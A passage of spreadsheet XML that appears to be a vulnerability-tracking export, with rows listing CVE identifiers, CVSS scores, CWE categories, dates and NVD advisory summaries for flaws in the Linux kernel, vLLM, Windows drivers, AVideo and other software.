        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr"/>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read in rtw_action_frame_parse()
rtw_action_frame_parse() takes a frame_len parameter but never
actually checks it before indexing into the frame body:
	const u8 *frame_body = frame + sizeof(struct ieee80211_hdr_3addr);
	...
	c = frame_body[0];
	...
	a = frame_body[1];
frame_body already points 24 bytes (sizeof(struct
ieee80211_hdr_3addr)) into frame, so reading frame_body[0] and
frame_body[1] requires frame_len &gt;= 26. A management action frame
shorter than that (e.g. exactly 24 bytes, the minimum a malicious
peer can send) causes a 1-2 byte out-of-bounds read.
This is reachable from rtw_cfg80211_monitor_if_xmit_entry() and
cfg80211_rtw_mgmt_tx() in ioctl_cfg80211.c, both of which pass
attacker/user-influenced frame buffers and lengths straight through.
Add the missing length check before frame_body is dereferenced.</t>
        </is>
      </c>
      <c r="S772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90017</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90555</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>vllm:vllm</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr"/>
      <c r="Q773" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>vLLM versions before 0.28.0 fail to validate audio sample rate headers in the transcription endpoint, allowing authenticated clients to bypass duration checks. Attackers can submit forged FLAC headers with inflated sample rates to trigger excessive memory allocation and crash the API server process affecting all tenants.</t>
        </is>
      </c>
      <c r="S773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90555</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90927</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>filebrowser through 2.63.23 fails to limit WebSocket message size in the /api/command handler before checking permissions, allowing authenticated users to buffer arbitrarily large messages. Attackers can send oversized WebSocket messages to exhaust server heap memory and cause denial of service regardless of EnableExec setting or Execute permission.</t>
        </is>
      </c>
      <c r="S774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90927</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91197</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>Flowable flowable-engine through 8.0.0 contains an XML external entity injection vulnerability in ProcessDiagramLayoutFactory.parseXml() that fails to disable external entity resolution when parsing deployed BPMN resources. Attackers with process deployment privileges can embed DOCTYPE declarations with external entities in BPMN files to read arbitrary local files or trigger requests to internal network endpoints when diagram layout is computed.</t>
        </is>
      </c>
      <c r="S775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91197</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92299</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr"/>
      <c r="Q776" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>@jitsi/electron-sdk before 10.0.5 exposes getDesktopSources() via contextBridge without requiring an active getDisplayMedia() picker, allowing any script in the meeting page to enumerate screens and windows. Attackers can call the jitsi-screen-sharing-get-sources IPC route to retrieve desktop thumbnails at arbitrary resolution without user consent or operating system permission prompts.</t>
        </is>
      </c>
      <c r="S776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92299</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92456</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr"/>
      <c r="Q777" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization on the saveRedisSet and getRedisSet endpoints in CrmCustomerController, allowing any authenticated back-office user to read and modify installation-wide lead-allocation and customer auto-recycling policy. Attackers can invoke these endpoints to manipulate shared Redis keys controlling customer auto-recycling behavior, causing mass customer data deletion, disabling lead recycling, or blocking customer creation across the deployment.</t>
        </is>
      </c>
      <c r="S777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92456</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92459</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr"/>
      <c r="Q778" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains a missing authorization vulnerability in the CrmCluesController receiveCustomer endpoint that allows authenticated back-office users to claim sales leads without proper permission checks. Attackers can invoke the lead-claim endpoint to reassign leads from other employees to themselves by overwriting the ownerUserId field, with no access logging or quota validation to prevent bulk lead theft.</t>
        </is>
      </c>
      <c r="S778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92459</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92582</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr"/>
      <c r="Q779" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>AVideo (WWBN/AVideo) through 29.0 (commit e01e41ecc) is vulnerable to cross-site request forgery. objects/videoAddNew.json.php disables AVideo's automatic CSRF guard ($global['skipAutoCSRFCheck']) and the untrusted-request check ($global['bypassSameDomainCheck']) merely because 'user' and 'pass' parameters are present in the request; the values are never validated and are read from $_REQUEST, so an attacker can supply them in the query string of a cross-site request. Because User::loginFromRequestIfNotLogged() returns immediately when a session already exists, a victim who is authenticated by cookie satisfies the check while the attacker-supplied credentials are discarded. An attacker who lures an authenticated user with upload rights to visit a crafted page can therefore submit cross-origin requests that modify video records — including ownership transfer (setUsers_id), deletion of user-group access restrictions, can_download, can_share, only_for_paid, video_password, rating, status, creation date, and view count. For a victim with administrator or Permissions::canAdminVideos() rights, any video on the site can be altered, including removing group restrictions from private content. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="S779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92582</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92601</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr"/>
      <c r="Q780" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>Guns through 8.3.5 contains an improper access control vulnerability in SysNoticeController where requiredPermission defaults to false and is not overridden by any action methods. Authenticated users without assigned roles can exploit this to create, edit, delete, publish and retract system-wide notices affecting arbitrary users and departments.</t>
        </is>
      </c>
      <c r="S780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92601</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92602</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr"/>
      <c r="Q781" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through version 5.3 fails to validate webhook URLs or verify form ownership in the WebhookConfigController. Authenticated attackers can attach webhooks to other users' forms and exfiltrate submissions to arbitrary external or internal addresses.</t>
        </is>
      </c>
      <c r="S781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92602</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92753</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr"/>
      <c r="Q782" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>PatrowlManager through 1.8.4 contains an authorization bypass vulnerability in the events and alerts API endpoints that lack ownership filtering. Authenticated attackers can read platform event history, delete arbitrary events, and modify alerts belonging to other users.</t>
        </is>
      </c>
      <c r="S782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92753</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92772</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr"/>
      <c r="Q783" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>Leantime before 3.9.6 contains an authorization bypass vulnerability in the HTMX plugin install endpoint that lacks permission validation. Authenticated users with limited roles can install marketplace plugins and control arbitrary properties including identifier, version, and license key to deploy malicious plugins.</t>
        </is>
      </c>
      <c r="S783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92772</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92773</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev before 4.6.0 fails to verify that an authenticated user controls a GitHub App installation before binding it to their organization. Attackers can claim another user's GitHub App installation by replaying state cookies and supplying sequential installation identifiers, gaining unauthorized access to the victim's repositories.</t>
        </is>
      </c>
      <c r="S784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92773</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92804</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr"/>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>Nango through 0.70.4 fails to validate caller-supplied connection configuration values interpolated into provider token and proxy URL templates. Authenticated attackers can supply malicious configuration values to direct server requests at internal addresses or cloud metadata endpoints, potentially exfiltrating provider credentials.</t>
        </is>
      </c>
      <c r="S785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92804</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K786"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786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68904</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr">
        <is>
          <t>npm:node-opcua, npm:node-opcua-client, npm:node-opcua-transport</t>
        </is>
      </c>
      <c r="M787" s="5" t="inlineStr">
        <is>
          <t>2.170.0</t>
        </is>
      </c>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr"/>
      <c r="Q787" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>node-opcua</t>
        </is>
      </c>
      <c r="S787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68904</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K788"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788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr"/>
      <c r="Q788" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="789">
